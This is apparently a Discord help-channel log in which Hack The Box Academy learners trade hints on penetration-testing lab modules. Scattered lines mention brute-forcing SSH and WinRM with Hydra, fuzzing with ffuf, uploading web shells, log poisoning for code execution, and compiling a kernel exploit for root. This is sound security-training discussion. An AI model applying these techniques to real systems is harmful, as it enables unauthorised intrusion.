Someone here that has done the web attacks module? i could need a nudge

manic ermine
grave inlet
#

Hi, normal the targets system for ffuf module doesn't work?

#

I tried with the pwnbox and vpn, the IP:PORT doesn't seem to answer

tight mesa
#

hello everyone, I need a hint

#

I'm currently working over LFI module Server Logs/Configuration section, but I can't find the information described in the module under /etc/apache2/apache2.conf

#

anyone who had made this module before could let me know if the webroot is inside another different file as "/etc/apache2/apache2.conf"

naive ravine
#

I am currently performing the last section of the Cracking into Hack the Box, The Knowledge check exercise. I think there is something on the host that used to depend on Flash and thus some of the functionality is broken. Is there an appropriate place where I can contact support for HTB Academy related content?

maiden slate
#

@naive ravine If you're in the module you should see a green circle in the bottom right corner of your screen, just contact them on there.

broken bronze
#

Can anyone help with assembly module?

storm shore
#

hello, can anyone explain to me the meaning behind key=decoded_key

#

on other parts in the program, it say serial serial=decoded_key

#

but the respective sites i am penetrating, is either serials.php or keys.php

#

how do i know which key i should use?

night zealot
#

Just to confirm, Can I repeat with BurpSuite modified responses from a Server? I know that requests can but I don't know if I have to modify the response and repeat it or do something in the request

barren stone
#

So, I am fairly confident with the command line, but am running through the academy (free) linux command line course, and for whatever reason, on the question "What is the index number of the "sudoers" file in the "/etc" directory?" it is not accepting my answer... My steps were: 1.) cd / 2.)cd etc 3.) ls -i | grep sudoers 4.)922354 sudoers 461 sudoers.d. Easy enough. But it is not accepting 922354 as the answer. Am I crazy, am I wrong, or are they trying to kill my machine to have me pay for it because I was beasting through the exercises since to 24 hr wait after the 1 termination.

gloomy torrent
#

Anyone done the Password Attack Module? I'm literally stuck on the first section

surreal rain
gloomy torrent
#

I was able to use cme to brute force the winrm user/pass, and from there I used evil-winrm to get powershell working, and got a list of users that are in rdp, smb. However I tried to brute force all passwords and none matched

#

that's pretty much my progress after 4 hours, no idea where to go from here lol

livid pier
maiden slate
#

@barren stone Are you getting a line count?

flint helm
#

bruh

#

the server-side attacks skills assessement was so dumb

#

not what I had expected at all

gloomy torrent
#

nvm i found it OMEGALUL

#

spent 5 hours on the wrong path

barren stone
# maiden slate @barren stone Are you getting a line count?

As far as I know, is that it is just asking for the inode or index number of sudoers in the etc file. I thought ls -i was the command for that number, but I must be wrong. I have been working on my hacking courses since like 3am and it's 10 already, so maybe I'm misreading. Hahaha.

maiden slate
#

@barren stone lol, if I remember correctly the index number is the number assigned to it as a location in the greater whole, do you have any screenshots, DM me.

maiden slate
#

If you're doing a total line count for the index make sure you're not also counting the first line that is just information and not the actual # of sudoers

#

@barren stone

distant stream
lethal atlas
#

did you add the domain to your /etc/hosts?

lethal atlas
drifting knoll
#

@lament crag pls be careful with spoilers

maiden slate
#

@lethal atlas ah MB

lethal atlas
#

Just a heads up for anyone on Information Gathering Web Edition. In the skills assessment the question regarding gear.githubapp.com cannot be answered at this time as that site no longer exists. I have notified HTB and they are aware of the issue and will work to fix it.

sly grotto
#

hey bro did you solve this?

#

i got stuck in command injections Bypassing Other Blacklisted Characters

solid lark
#

could someone help me with the broken authentication module? im stuck at the part Predictable Reset Token

maiden slate
#

@lethal atlas NOOOOOOO! I can't finish!

#

@lethal atlas What section is that in?

lethal atlas
#

skills assessment

sly grotto
lethal atlas
night zealot
night zealot
lethal atlas
#

It probably has to do with aggression level of your scan.

#

try whatweb -a 3

devout cliff
#

im on the same module, info gathering web edition on section for active subdomain enumeration, when i am trying my nslookup command im getting an error: 'server cant find inlanefreight.htb:NXDOMAIN' what am i doing wrong

tight mesa
#

apologies in advance if this is a silly question, but can anyone help me to understand how to do the last question from LFI Dir Traversal module under File Inclusion Prevention section..???

lethal atlas
devout cliff
#

or something similar. let me open my VB back up

#

yeah that was it

#

nslookup -type=NS inlanefreight.htb

#

and it just threw an error back to me of 'server cant find inlanefreight.htb: NXDOMAIN'

blissful verge
final salmon
#

Is the forum down? Can't seem to load the academy modules?

west canopy
#

@final salmon Both seem to be working fine on my end

frozen lily
#

working the Active Directory LDAP - Skills Assessment and I'm literally on the last question: "What non-default privilege does the htb-student user have?" I am running whoami /priv and there are only two. Neither work. What am I missing?

west canopy
#

@frozen lily try launching an elevated powershell (as in right click -> run as administrator) , then run whoami /priv

raven cairn
#

I am having trouble with File upload attacks: Blacklist filters.

#

I was able to fuzz the available extensions with burp, and change the filtering on the front end to upload shells. I have then tried accessing the uploaded shells.

#

I don't understand what I am doing wrong.

west canopy
#

@raven cairn DM me dawg i got you

frozen lily
weary forum
#

Hello, everyone. I am having trouble with the Web Requests Module.

#

I am supposed to send a JSON post request to /search.php. However, when I enter the command, all I get is either "empty search data" or the dreaded ">" with no input

#

I don't know what I'm doing wrong, or why I get the ">"

west canopy
#

@weary forum you are missing an apostrophe at the end of your command 🙂

#

'

sweet heron
#

Other than "file", is there another command/way to know how a .vhd is being encrypted? It doesn't give the info.

weary forum
sweet heron
#

Can someone give a hint on the last question of the footprinting module, DNS section. Find the fqdn that ends in .203. I've tried dnsenum on all sub/sub.sub domain.

proud sparrow
#

why it says "connect: Network is unreachable"

#

im trying to use whois command on domain..

#

anyone?

sweet heron
lucid mirage
sweet heron
#

I'm also stuck at the imap one in the footprinting module. The mail "inbox" is empty

lethal atlas
#

dm me for help

sweet heron
#

yes

feral gyro
rustic sage
#

lsexit

winged roost
#

hey all, just on the wordpress skills assessment and im stumped at the first question... am i correct in presuming that it is not as straight forward and there is a twist to find the version number?

acoustic owl
winged roost
manic ermine
#

Any more assistance with the password attacks module? I've managed to crack Winrm by pure bruteforce with the files provided. I've tried brute forcing the other services with the usernames provided also to no avail, and have spent 48 hours bruteforcing the other services with the files provided but still not cracked anything

rare jackal
#

For Login Brute Forcing section of Skill Assignment - Website. I have used hydra to brute force the admin panel and have tons of hit. However, when I enter matching usernames and passwords in the admin panel it just loops back to the admin panel login screen. Anyone have any advice?

late beacon
#

juicypotato/printspoofer not working for Windows Privilege Escalation Skills Assessment - Part I for some reason

acoustic owl
winged roost
night zealot
#

Can somebody give me a hint about Skill Assessment - Using Web Proxies? I think that I'm doing it correctly but the result is always the same

kindred scroll
#

I gotta say windows fundamentals course is kinda messed up. Like they taught me one thing, asked me to do another thing and even after researching it just doesn't work. Maybe I did something wrong, but the assignment also seemed to be quite vague. Just ridiculous, can't imagine windows being harder than linux at this point

#

I somehow get the wrong SID, even tho I did everything as they told me 😦

#

I can't even ask for help cuz I don't know where I got it wrong monkaS

#

Maybe if someone has the time to do this step-by-step with me. But no one does Sad_Squidward_Pepe

night zealot
kindred scroll
#

I guess it does make sense now but it should still be ordered properly, I am doing this for the first time and I don't expect rabbit holes FeelsBadMan

shadow mist
sweet heron
#

Hey I need help on password attacks hard lab: mounting the vhd file. dislocker gives me a cannot parse volume header error and guestmount just doesn't work

tight mesa
#

hey anyone who can give me a hint how to identify/enumerate the path transversal in the final challenge of LFI?

#

cause when I'm fuzzing to identify payloads I got a bunch of matches

tight mesa
#

yes

lethal atlas
tight mesa
#

checking this out, ty

sweet heron
#

Footprinting lab medium. I'm connected as administrator via freerdp, but I can't find anything related to a htb user. I'm really lost in the sql studio as I don't know how to navigate nor what to search for.

sweet heron
maiden slate
#

Has anybody done the gobuster-DNS section of the 'Information Gathering - Web Edition' module? I need some help.

lethal atlas
maiden slate
#

I'll send you a screenshot, thought you might have been out to lunch.

sweet heron
late beacon
#

Hey, so I completed every module available to me on the Student plan and a few extra ones by spending the cubes I earned. Is there any other way to get cubes without buying them? And do you get some cubes as a reward if you pass the new cert?

kindred scroll
#

Just search up those topics on YouTube. I wouldn't recommend spending money on things before you finish up all the free material

urban sage
lethal atlas
#

wow!!! a Sr. speaks.

#

we are not worthy of your presence here lol

hallow remnant
#

Requesting nudge on File Upload Skills Assessment; have directory where files are being uploaded to, but I think I'm misinterpreting how the naming convention is meant to be applied

west canopy
#

@hallow remnant DM me 🙂

knotty hemlock
#

I'm at the password attacks module, network services, and it takes superlong using the wordlist provided, plus I get many connection issues and false positives especially for RDP. Do I miss something...?

knotty hemlock
manic ermine
livid pier
mellow whale
#

It was a labor of love @livid pier

unique valve
livid pier
unique valve
livid pier
blissful verge
#

its immense and absolutely packed with AD awesomeness, to the tune of 82,000 words 🙂

livid pier
manic ermine
#

Anyone online able to give me some pointers on the password attacks module?

west canopy
#

@manic ermine That module scares me, i haven't started it lol

manic ermine
livid pier
#

@unique valve @mellow whale @blissful verge only 3 sections in and it already feels like this is the supreme module. The set up is amazing. The use of 'Scenario' should be used in more mods.

kind forge
#

any in FFUF module? good night

#

any finish FFUF Module?

swift cove
#

is academy broken right now? my pwnbox keeps connecting and disconnecting after a few seconds

west canopy
#

@kind forge I might be able to help, what's up?

raven cairn
#

Can I have help with SQLmap essentials bypassing web application protections, case 8?

west canopy
#

@raven cairn DM me 🙂

kind forge
#

I fuzzed the parameters "user" and "username" in question 5 of the final exam of the FFUF module to obtain their values and then do the curl to bring the flag, but I can't find any differential factor
could you help me?

#

I don't know what wordlist to use anymore? could you guide me on that?

west canopy
#

yes try using names.txt , located in seclists/usernames/Names/

kind forge
#

but launch almost all of the username folder hahaha

#

i try

#

cirt-default-usernames.txt

#

mssql-usernames-nansh0u-guardicore.txt

#

sap-default-usernames.txt

#

top-usernames-shortlist.txt

west canopy
#

use names.txt

kind forge
#

what parameter bro? user or username?

west canopy
#

@kind forge DM me !

manic zealot
#

guys i need help with the web attacks, Mass IDOR Enumeration section question. the target documents.php page with any uid won't give me anything. I ran the enum script, nothing collected.

steep sable
#

@manic zealot if you intercept the traffic in burp you will see something 😉

spare vault
#

negroszsd

steady forge
#

In network traffic analysis module wireshark three packet pane names how to answer this question anyone please help the format of this answer

#

Packet l___ , Packet b____ , Packet d_____.

#

I tried many format but it's shows only error

meager lynx
#

Hey, not sure where to post this. But I noticed a spelling-error. In "Introduction to Web Applications > Web Application Layout > Microservices".

#

I had to google "what the heck is re-silence"

urban sage
# blissful verge

Dangit. Another module todo. I'm still trying to catch up. 😂

maiden slate
#

Anybody online that can help me for a sec with these questions in the Information Gathering- Web Edition section?

#

I keep using the methods of nslookup and dig in the module, but keep getting either dropped connections or server cannot locate errors, I'm not sure what I'm doing wrong.

lethal atlas
lethal atlas
steady forge
#

I got the answers but I submit it's shows wrong in intro to network traffic Analysis on wireshark fundamentals

lethal atlas
#

ugh, I think they may have updated that module. I dont have wireshark fundamentals in my notes

lethal atlas
modest moth
#

found a slight typo in the Server Side attacks module

#

who would i send this to?

muted rampart
#

erratum

#

the group one down

modest moth
#

thanks

bold forge
#

Can I get some help? I'm doing Web Requests and on section HTTP headers. It wants me to use the dev console to find a request to a file of flag_.... But there is no request to said file.

muted rampart
#

dm me

solid lark
proper pumice
#

hey people, i'm stuck at "Web Attacks - Skills Assessment" trying to reset password for user, can't seem to find the way to do it right, always getting "Access denied" what am i doing wrong ? Any help greatly appreciated

lethal atlas
bold forge
#

@lethal atlas that's okay, I think it's actually an issue I found that I need to report to support. However I am willing to take tips on note taking lol

lethal atlas
bold forge
#

@lethal atlas I shall look into cherry tree. Thanks

livid pier
jagged zenith
#

Hello guys

#

Who complete path bug bounty

sweet heron
#

Shells and payload, lab assignment 2nd host: I get an error using the exploit in msf: "NoMethodError undefined methot 'split' fo nil:NilClass"

lethal atlas
#

that means your options need checked.

sweet heron
#

maybe the URI of the arkei gate. Set to /, but did not find anything else with gobuster. I got my rhost, the creds. For some reason, there is no lhost, but i set it nonetheless.

#

Got it, it was the vhost. Why did I need to set it to the url in this situation? Rhost was not enough?

marble tinsel
#

Can someone help me with IMAP/POP3 from the Footprinting Module? somehow i am not able to enumerate the users to get the admin email :/

lethal atlas
marble tinsel
rustic sage
#

hey everyone. im having some issues with my new kali vm freezing while running zap and Burpsuite. i think it might be the amount of memory i have allotted to the vm. how much is sufficient? i have 16gb available (i have some 32 gb sticks coming soon) i currently have 4 gb assigned to the vm

sweet heron
sweet heron
#

Number of processors maybe? I gave 8, so I assigned Kali 4. Also video memory which I put to max (128mb)

#

I have 8**

rustic sage
#

running much smoother.

sweet heron
#

I'm having trouble with fuzzing vhost in ffuf module. I add the target ip to my /etc/hosts (<ip> academy.htb) and I'm using this command: "ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt:FUZZ -u http://academy.htb:30863/ -H "Host: FUZZ.academy.htb" and I'm getting no results, going at 1req/sec...

west canopy
#

@sweet heron which section is that?

sweet heron
#

Filtering results

west canopy
#

Just checked my notes, your command looks right. Maybe try respawning the target?

lethal atlas
west canopy
#

Yes maybe check the wordlist , I used the same one but it was from my seclists directory

livid pier
#

1 req/sec tho

rotund gust
#

Hi, would anyone be able to give a hint on the skills assessment for SQLMap essentials? I know the page to attack but unsure on finding the parameter(s)

lethal atlas
livid pier
lethal atlas
#

true

#

even for intruder 1 per second is crazy slow. I have had to add delays in intruder attacks before

sweet heron
#

either super slow or goes trough the list with errors count super high

solar zodiac
#

wow the new module on AD is incredible

#

so much content and such good content

#

thanks :D

lethal atlas
#

I know they worked hard on it

solar zodiac
#

I was blown away

#

when I read it

lethal atlas
sweet heron
#

Getting no positive hits on the parameter fuzzing in ffuf module. They say to do it against the target ip. I use the following command (nothing in /etc/host for this part right?) ffuf -w /usr/share/wordlists/burp-parameter-names.txt:FUZZ -u http://159.65.27.79:30637?FUZZ=key -fs 986 (false positive on fs 986) or should I run it against a particular page?

#

It auto added a / before ?, but my command doesn't have it

west canopy
#

@sweet heron just checked my notes and on the "Parameter Fuzzing GET" section I ran it against admin.academy.htb

#

Yea it looks like in all of the examples in the section they are running against admin.academy.htb

sweet heron
#

Yes, the scan just hangs. It looks like everytime I need to edit /etc/hosts, it doesn't work with ffuf.

#

Now my -u is http://admin.academy.htb:port?FUZZ=key with the <ip> admin.academy.htb in /etc/hosts. Same bug as vhost fuzzing.

west canopy
#

think you need to target /admin/admin.php?FUZZ=key

sweet heron
#

ok it worked. I'll try again the vhost exercise then.

#

thanks a lot btw!

west canopy
#

np 🙂

sweet heron
#

Ok, so regarding my vhost fuzz problem, I needed to change everything to admin.academy.htb too. (in hosts and in -u). I thought my -u url should be the same as my -H host.

sweet heron
#

Ok now it's on value fuzzing. At the end, the curl with the newly found id just hangs. I can load the page in firefox, but can't curl to it: curl http://admin.academy.htb:32543/admin/admin.php -X POST -d 'id=XX' -H 'Content-Type: application/x-www-form-urlencoded'

#

Ok, I guess a lot of targets are down in this module, I finally reset to an ip that worked.

west canopy
#

docker shenanigans

formal sphinx
#

I am stuck on "Using Web Proxies" final section. How to have payload inside another payload in burp?

livid pier
formal sphinx
west canopy
#

@formal sphinx I just manually pre-pended the 31 character hash to every line in the wordlist . And then had it encode the entire payload

formal sphinx
livid pier
#

there is one sec

#

im opening up burp

#

payload processing

#

or how ever you need to encode it

formal sphinx
#

Here is task: "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)"

#

And here is help: "With payload processing in Burp Intruder, first add the decoded cookie as a prefix to the payload, then encode the entire payload with the same encoding methods you identified earlier (in reverse order). The final payload should be 88 characters long, similar to the one from the previous question."

#

I need to add string to another string and then encode it

#

But i can't have payload in another payload

west canopy
#

Yea i just did it manually, editing the wordlist to include the hash before each character

#

then encode the entire thing

#

I get what you're asking about a payload inside a payload, i feel like burp should be able to do it but i'm not sure how

formal sphinx
#

Yeah........

#

Thanks for help 🙂

lethal atlas
#

i can tell you how to make burp do it all for you

#

@formal sphinx @west canopy if you guys wanna know I will show you in DM

tight mesa
#

hi everyone

#

who can give me a hand with this question:

In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

from SQL Injection Fundamentals Module and SQL Operators section

#

I really would like to check if my query is right, that all

west canopy
#

@tight mesa DM me 🙂

feral gyro
#

i need to if there is another way to do it

summer lake
#

Holla everybody

#

Doing "using web proxies" Proxying tools portion. I'm using kali. But when I curl proxychains curl http://IP:PORT get this $ proxychains4 curl http://134.209.23.209:30121
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: https 127.0.0.1 8080

Anyone faced this issue too?

sweet heron
#

ffuf module, the skill assessment, question 3: "One of the pages you will identify should say 'You don't have access!'" I only found a couple index.php and two directories. All blank or forbidden pages. I tried the command on all 3 subdomains, my /etc/hosts is working properly for them (I have some hits), but still not the page we are looking for. Any hint? My command: "ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://<VHOST>.academy.htb:32732/FUZZ -e .xxx,.xxx,.xxx -v --recursion -recursion-depth 1 -fs 287"

west canopy
#

@sweet heron still having problems?

sweet heron
#

Yes.

west canopy
#

DM me 🙂

unique latch
#

hello?

long quest
#

Hi all, I need help on HTB academy. I have connected to the academy OpenVpn but any target i spawn in the challenges its not connecting to. I cant seem to even ping the machine. I have tried from pwn box and local machine and I am having no luck. Can anyone help or point me in the right direction to seek help. Thanks

opal tide
#

Hi, I have a problem with the module Windows Fundamentals. I can't connect to the machine. Not with the HTB machine and not with my own machine. I can't ping the IP either. I completed other modules before and after trying Windows Fundamentals and it works everywhere else. Does anybody else have this problem?

unique valve
hollow knot
#

@sweet heron did you figure out how to mount the vhd from hard password attacks?

opal tide
# unique valve In what way are you trying to connect? RDP, SMB, ICMP (via ping)?

With RDP. It worked now for a minute and then the connection was gone again.

[07:45:04:721] [4315:4316] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[07:45:04:724] [4315:4316] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[07:45:04:724] [4315:4316] [INFO][com.freerdp.client.common] - Network disconnect!

unique valve
opal tide
#

it works now even without respawning. I tried the same command yesterday and couldn't connect

tiny owl
#

Plzz help

#

Hwoke u_serious

tight mesa
#

hi everyone
[6:58 PM]
who can give me a hand with this question:

In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

from SQL Injection Fundamentals Module and SQL Operators section
[6:59 PM]
I really would like to check if my query is right, that all

blissful verge
#

hey all! I'm looking for a web-focused Training Developer to join our Academy team. If you or anyone you know may be a fit, please reach out! More about the role here: https://apply.workable.com/hack-the-box-ltd/j/ABC10ADAEB/

ocean pier
#

Hi,
I'm starting Linux Fundamentals module. The question I'm stuck on (can't get the right answer) is the following <Which kernel version is installed on the system? (Format: 1.22.3)>. I used <uname -r>, but the answer (5.10.0) was rejected by the system. I also tried <uname -v>, and that answer (5.14.0) was also rejected. What am I doing wrong?

feral gyro
#

and try uname -r

ocean pier
#

Thanks @feral gyro I was logged in the machine, and used <uname -r>. But the box on free account has been closed now. Can I still get the IP of the machine?

ocean pier
#

Will the answer of my own (personal VM) be accepted in HTB Academy module? I doubt that.

lethal atlas
ocean pier
ocean pier
lethal atlas
#

You should notice that whatever IP you get in pwnbox, you will also get on your own VM when using the VPN connection.

ocean pier
lethal atlas
#

you might try sudo openvpn <Path to>/academy.ovpn

#

leave the --config off

ocean pier
lethal atlas
#

nice... Happy hacking

ocean pier
# lethal atlas nice... Happy hacking

Well, I don't even know the basics of fundamentals 😞 Far away from any hacking. Perhaps, with nice community members like you, I'll learn few things.

lethal atlas
#

You will always find help here. There are a lot of good people on here who are at various stages in their journey. The main key is to read carefully. Most every question can be answered just following the examples

ocean pier
lethal atlas
#

anyone online that can answer a question about buffer overflow in linux

west canopy
#

@lethal atlas i can try!

knotty hemlock
#

hope connections will be more stable..

marble tinsel
#

How can it be that I sometimes can't ping the Academy VM and then it works again after a while by itself? The VPN connection is established

lethal atlas
#

It seems to me that US - 2 is having issues

#

i changed to US -1 and it's been much steadier

marble tinsel
lethal atlas
marble tinsel
lethal atlas
marble tinsel
#

Well thanks a lot xD

lethal atlas
#

click vpn settings then select a new region. After you will need to download a new ovpn file

#

hope that helps your connection. Like I said it seemed to fix mine

marble tinsel
#

Unfortunately it did not help :/

devout cliff
#

would anyone be willing to help me with the phishing section of the XSS module?

devout cliff
#

trying to figure out how to construct this payload

#

like im finding the exploits via XSStrike that should work

#

but how to put the payloads into it is confusing me

lethal atlas
#

honestly if you just follow the examples from that section you will get thru it

devout cliff
#

i tried that last night and it seemed to just break every time but ill try again

west canopy
#

Looking for some guidance on Stack Buffer Overflows Windowsx86, section "Controlling EIP". When i run my win32bof_exploit.py script , i am getting error: name 'payload' is not defined. I have no clue what I am doing wrong, I think my script is correct:

west canopy
#

I'm losing my mind 😦

marble tinsel
#

i guess because it is in another function?

#

just tab it in. The indentation is not right

west canopy
#

Thank you brother , that was the problem

marble tinsel
#

No problem 🙂

west canopy
#

I need to learn python.

marble tinsel
#

Yes these are pretty common mistakes when you program python for a while 😄

blissful verge
glad orbit
#

Help for the module: Windows Privilege Escalation Skills Assessment - Part I (Question N.2)
I solved all questions but not the second question:
Find the password for the ldapadmin account somewhere on the system.
Where is this password in the system? I search with Lazagne and other string command.
Tnx

sweet heron
west canopy
#

@glad orbit DM me 🙂

warm lava
#

Does anyone have any idea how to go about solving the XSS - Phishing Module? I cannot seem to figure out what they are trying to do here or how to get the URL to send to so that some mysterious credential I login with is going to let me login

west canopy
#

@warm lava I might be able to help

warm lava
#

Jared you must live on here

west canopy
#

Pretty much lol

warm lava
west canopy
#

so my notes on this section aren't super detailed but if you wanna DM me i can show you

lethal atlas
#

I think that's the one you use document.write()

#

Unfortunately I'm away from a computer all weekend

sour loom
#

what do you get from silver htb academy ?

lethal atlas
#

A monthly allotment of cubes

sour loom
#

there is no way for me to have access to every pentesting windows related course in one month ?

lethal atlas
#

Sure, if you can complete the modules fast enough

sour loom
#

because i paid silver and i only have 240 cubes

lethal atlas
#

As you complete a module you get some cubes back

sour loom
#

it says i'm enrolled to Active Directory Enumeration

#

ah ok

#

but when i open it i have to pay 1000 cubes

lethal atlas
#

That's tier 3?

#

There are so many modules in the lower tiers to do.

#

I recommend the bug bounty hunter path

sour loom
#

this path is not good for me

lethal atlas
#

Ok.

sour loom
#

i wanted to do Active Directory Enumeration

lethal atlas
#

Then you will have to buy cubes

sour loom
#

I just need to skill up on active directory and windows

#

ok

#

thanks

lethal atlas
#

Yw

sweet heron
#

File inclusion module, server log poisoning question. Once I poison my user-agent, I can't get back the server to show the access.log nor doing RCE.

lyric inlet
#

Hello

#

Thanks for the new AD module

#

very fun

ocean pier
#

Hello everyone,
I just started yesterday with HTBA. My first attempts were using only Workstation instances, which has a limited time per day. Thanks to @lethal atlas and @feral gyro , I setup OpenVPN, and now I can connect from my Distro to HTBA using ssh (VM?). Since this also has limit per session (1 hr), where can I quickly get the new IP address to connect? From Dashboard or any other place/link?

jagged summit
jagged summit
misty remnant
#

need some help with information gathering, would be great if i can dm somebody

flint helm
#

Hey I'm stuck at broken authentication login bruteforcing, none of these have worked.

west canopy
#

@flint helm Try filtering the wordlist for passwords that are all upper case with a number at the end, i.e. PASSWORD2

flint helm
#

aaah, I didn't test without lowercase braindamage

raven cairn
#

Stupid question. On broken authentication -- default credentials.

#

I am trying to find the default credentials for a login. The website title is Webaccess HMI/SCADA Software

#
GitHub

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, pas...

GitHub

SCADA StrangeLove Default/Hardcoded Passwords List - SCADAPASS/scadapass.csv at master · scadastrangelove/SCADAPASS

raven cairn
#

I've looked for a while lol. Don't know why I can't find it.

livid pier
raven cairn
#

I did. Will I find the user and password in the picture?

livid pier
#

Oh i may have misread, you are saying you tried these and they didnt work?

raven cairn
#

I tried admin:blank

livid pier
raven cairn
#

Got it

knotty hemlock
#

I ran a brute force attack on SSH with hydra for the last couple of hours, and then finally I noticed that the host is not even reachable anymore because spawn time was over 😩 Is there a way to detect this? I wasted hours bruteforcing a target that was not even up 🙈
This is from the Password Attacks module... with the provided lists and 16 threads it takes more than 2 hours, but the machine only spawns for 70 minutes...

livid pier
#

I cut the password list in half

#

did one half one session

#

second half the other

knotty hemlock
#

i see... but it still means, you can never be sure that you didn't miss the correct credentials because of some connection error, right? ☹️ did you set the threads to -t 4 as recommended by hydra, or did you leave it at default?

livid pier
#

i did -t 4

knotty hemlock
#

thx, I left it at 16 because then it was really fast. but i guess it doesnt work that way 🥲 new try...

raven cairn
knotty hemlock
raven cairn
#

You also brute force SSH in that module.

knotty hemlock
#

i feel the "password attacks" module could use some hints. It's a bit pointless to provide wordlists with 20000 combinations if time runs out after 60 minutes 😩 or maybe i'm missing something.

sweet heron
#

Hey friends! I was not able yesterday to reproduce the server log poisoning in the LFI module. Any one can check my inputs? 🙂

#

I'm also here to help with plenty of modules.

rough radish
#

Hi guys, (first post)
I am in the Linux priv esc module and I cannot get past task one.
i cannot seem to run this line,
gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit
there is no file that ends with ".c" after downloading the kernel exploit
forgive the question if i am being bone headed

rough radish
#

Kernel Exploits

raven cairn
#

Copy and paste the code into a file, and name it with .c

#

That should work.

#

That is what I did.

rough radish
#

Ooooohhhhhh.... noted

raven cairn
#

compile, change permissions, and run. You should get Root.

rough radish
#

i will try now. thank you so much

#

Question. why can i not just rename the file and add ".c" to the end?

ocean pier